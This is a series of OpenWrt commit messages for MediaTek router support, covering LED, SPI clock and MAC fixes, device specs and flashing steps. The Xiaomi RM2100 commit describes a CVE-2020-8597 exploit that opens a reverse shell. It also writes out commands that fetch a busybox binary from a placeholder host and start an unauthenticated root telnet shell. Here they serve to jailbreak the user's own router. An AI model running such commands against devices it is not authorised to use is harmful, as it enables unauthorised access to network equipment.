base-files/etc/board.d/01_leds to the device-tree file.
This has been applied to R6120 based on findings for the very similar
Netgear R6080.
Signed-off-by: Alex Lewontin <alex.c.lewontin@gmail.com>
[merge case in 01_leds, slightly adjust commit message/title]
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
Increase the SPI frequency for ELECOM WRC-1900GST and WRC-2533GST
to 40 MHz by updating the common DTSI file.
Signed-off-by: INAGAKI Hiroshi <musashino.open@gmail.com>
[WRC-1900GST]
Acked-by: NOGUCHI Hiroshi <drvlabo@gmail.com>
[split patch, adjust commit title/message]
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
With the new driver, MAC addresses are not set up in DTS anymore,
and therefore label-mac-device will be useless there.
Setup is done properly in 02_network, so this just removes the
obsolete alias.
Fixes: 5e50515fa6b3 ("ramips/mt7621: mikrotik: don't use
mtd-mac-address in DTS")
Suggested-by: John Thomson <git@johnthomson.fastmail.com.au>
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
NETGEAR WAC104 is an AP based on castrated R6220, without WAN
port and USB.
SoC: MediaTek MT7621ST
RAM: 128M DDR3
FLASH: 128M NAND
WiFi: MediaTek MT7612EN an+ac
MediaTek MT7603EN bgn
ETH: MediaTek MT7621ST (4x LAN)
BTN: 1x Connect (WPS), 1x WLAN, 1x Reset
LED: 7x (3x GPIO controlled)
Installation:
Login to netgear webinterface and flash factory.img
Back to stock:
Use nmrpflash to revert stock image.
Signed-off-by: Pawel Dembicki <paweldembicki@gmail.com>
The WAN LED on DIR-810L was actually blinking on LAN1 port
activity. This has already been improved for the TEW-810DR, where
the GPIO has been set up explicitly rather than having it controlled
by the switch.
This patch also applies this setup to the DIR-810L.
In addition, the trigger in 01_leds is set up with
ucidef_set_led_switch for both devices now, so state changes should
be displayed correctly as well.
Reported-by: Roger Pueyo Centelles <roger.pueyo@guifi.net>
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
Tested-by: Roger Pueyo Centelles <roger.pueyo@guifi.net> [DIR-810L]
Tested-by: J. Scott Heppler <shep971@centurylink.net> [TEW-810DR]
According to the manual, the amber power LED is used to indicate boot,
while the green LED is meant to indicate a running system.
While at it, also adjust the DT node names for all LEDs.
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
Specifications:
* SoC: MT7620A
* CPU: 580 MHz
* RAM: 64 MB DDR
* Flash: 8MB NOR SPI flash
* WiFi: MT7612E (5GHz) and builtin MT7620A (2.4GHz)
* LAN: 1x100M
The device is identical to the EX6130 except
for the mains socket and the hardware ID.
Installation:
The -factory images can be flashed from the
device's web interface or via nmrpflash.
Notes:
MAC addresses were set up based on the EX6130 setup.
This is based on prior work of Adam Serbinski and Mathias Buchwald.
Tested by Mathias Buchwald.
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
Previously the dts were using a value determined by empirical testing,
because of a spi driver/clock bug. The bug was fixed quite some time
ago. 33 MHz is the default clock frequency used by RouterBOOT and thus
safe.
Signed-off-by: Tobias Schramm <t.schramm@manjaro.org>
Specifications:
* MediaTek MT7620A (580 Mhz)
* 8 MB of FLASH
* 64 MB of RAM
* 2.4Ghz and 5.0Ghz radios
* 5x 10/100 Mbps Ethernet (1 WAN and 4 LAN)
* UART header on PCB (57600 8n1)
* Green/Orange Power LEDs illuminating a Power-Button Lens
* Green/Orange Internet LEDs GPIO controlled illuminating a Globe/Internet Lens
* 3x button - wps, power and reset
* U-boot bootloader
Installation:
The sysupgrade.bin image is reported to be OEM web flashed with an ncc_att_hwid
appended. ncc_att_hwid is a 32bit binary in the GPL Source download for either
the TEW-810DR or DIR-810L and is located at
source/user/wolf/cameo/ncc/hostTools.
The invocation is: ncc_att_hwid -f tew-810dr-squashfs-factory.bin -a -m "TEW-810DR" -H "1.0R" -r "WW" -c "1.0"
This may need to be altered if your hardware version is "1.1R".
The image can also be directly flashed via serial tftp:
1. Load *.sysupgrade.bin to your tftp server directory and rename for
convenience.
2. Set a static ip 192.168.10.100.
3. NIC cable to a lan port.
4. Serial connection parameters 57600,8N1
5. Power on the TEW-810 and press 4 for a u-boot command line prompt.
6. Verify IP's with U-Boot command "printenv".
7. Adjust tftp settings if needed per the tftp documentation
8. Boot the tftp image to test the build.
9. If the image loads, reset your server ip to 192.168.1.10 and restart network.
10. Log in to Luci, 192.168.1.1, and flash the *sysupgrade.bin image.
Notes:
The only valid MAC address is found in 0x28 of the factory partition.
Other typical offsets/caldata only contain example data: 00:11:22:00:0f:xx
Signed-off-by: J. Scott Heppler <shep971@centurylink.net>
[remove "link rx tx" in 01_leds, format and extend commit message,
fix DTS led node names]
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
Specifications:
- MT7628NN @ 580 MHz
- 32 MB RAM
- 8 MB Flash
- 5x 10/100 Mbps Ethernet (built-in switch)
- 2.4 GHz WLAN
- 2x external, non-detachable antennas (1x for RT-N10P V3)
Flash instructions:
1. Set PC network interface to 192.168.1.75/24.
2. Connect PC to the router via LAN.
3. Turn router off, press and hold reset button, then turn it on.
4. Keep the button pressed till power led starts to blink.
5. Upload the firmware file via TFTP. (Any filename is accepted.)
6. Wait until the router reboots.
Signed-off-by: Ernst Spielmann <endspiel@disroot.org>
[fix node/property name for state_default]
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
Specification:
- CPU: MediaTek MT7621A
- RAM: 128 MB DDR3
- FLASH: 128 MB ESMT NAND
- WIFI: 2x2 802.11bgn (MT7603)
- WIFI: 4x4 802.11ac (MT7615)
- ETH: 3xLAN+1xWAN 1000base-T
- LED: Power, WAN, in Amber and White
- UART: On board near ethernet, opposite side from power
- Modified u-boot
Installation:
1. Run linked exploit to get shell, startup telnet and wget the files over
2. mtd write openwrt-ramips-mt7621-xiaomi_rm2100-squashfs-kernel1.bin kernel1
3. nvram set uart_en=1
4. nvram set bootdelay=5
5. nvram set flag_try_sys1_failed=1
6. nvram commit
7. mtd -r write openwrt-ramips-mt7621-xiaomi_rm2100-squashfs-rootfs0.bin rootfs0
Restore to stock:
1. Setup PXE and TFTP server serving stock firmware image
(See dhcp-boot option of dnsmasq)
2. Hold reset button down before powering on and wait for flashing amber led
3. Release reset button
4. Wait until status led changes from flashing amber to white
Notes:
This device has dual kernel and rootfs slots like other Xiaomi devices currently
supported (mir3g, etc.) thus, we use the second slot and overwrite the first
rootfs onwards in order to get more space.
Exploit and detailed instructions:
https://openwrt.org/toh/xiaomi/xiaomi_redmi_router_ac2100
An implementation of CVE-2020-8597 against stock firmware version 1.0.14
This requires a computer with ethernet plugged into the wan port and an active
PPPoE session, and if successful will open a reverse shell to 192.168.31.177
on port 31337.
As this shell is somewhat unreliable and likely to be killed in a random amount
of time, it is recommended to wget a static compiled busybox binary onto the
device and start telnetd with it.
The stock telnetd and dropbear unfortunately appear inoperable.
(Disabled on release versions of stock firmware likely)
Ie. wget https://yourip/busybox-mipsel -O /tmp/busybox
chmod a+x /tmp/busybox
/tmp/busybox telnetd -l /bin/sh
Tested-by: David Martinez <bonkilla@gmail.com>
Signed-off-by: Richard Huynh <voxlympha@gmail.com>
The location 0x28 in factory partition is the common one used for
ethernet address on this architecture. Despite, it contains the label
MAC address for the devices at hand.
Consequently, this patch moves 0x28 to the ðernet node in DTS files
(setting the WAN MAC address there) and sets up the lan_mac from 0x22
in 02_network. As a benefit, this allows to use label-mac-device in
DTS instead of ucidef_set_label_macaddr.
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
Like for the RT-AC54U, this uses a DT trigger for WiFi also at the
RT-AC51U. While at it, rename node and label to wifi2g.
Note that the 5g WiFi LED still isn't supported (see PR #3017 for
further details: https://github.com/openwrt/openwrt/pull/3017 )
Tested-by: Davide Fioravanti <pantanastyle@gmail.com>
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
The current MAC address assignment for the ASUS RT-AC51U is "wrong",
it actually should be the same as for the RT-AC54U. Fix it.
MAC assignment based on vendor firmware:
2g 0x4 label
5g 0x8004 label +4
lan 0x22 label +4
wan 0x28 label
Thanks to Davide Fioravanti for checking this on his device.
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
This increases the SPI frequency for both ASUS RT-AC51U and RT-AC54U.
Speed comparison tests have been performed on RT-AC54U:
- 10Mhz
root@OpenWrt:~# time cat /dev/mtd* > /dev/null
real 4m 37.78s
user 0m 0.02s
sys 2m 43.92s
- 50Mhz
root@OpenWrt:~# time cat /dev/mtd* > /dev/null
real 1m 28.34s
user 0m 0.03s
sys 0m 46.96s
- 50Mhz fast read
root@OpenWrt:~# time cat /dev/mtd* > /dev/null
real 1m 11.94s
user 0m 0.01s
sys 0m 46.94s
- 80Mhz
root@OpenWrt:~# time cat /dev/mtd* > /dev/null
real 1m 12.31s
user 0m 0.04s
sys 0m 46.96s
- 80Mhz fast read
root@OpenWrt:~# time cat /dev/mtd* > /dev/null
real 1m 12.15s
user 0m 0.02s
sys 0m 46.97s
Based on that, we took 50 MHz with fast-read, as higher frequencies
didn't yield further improvements.
For the RT-AC51U, only the final configuration was tested.
Tested-by: Zhijun You <hujy652@gmail.com> [RT-AC54U]
Tested-by: Davide Fioravanti <pantanastyle@gmail.com> [RT-AC51U]
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>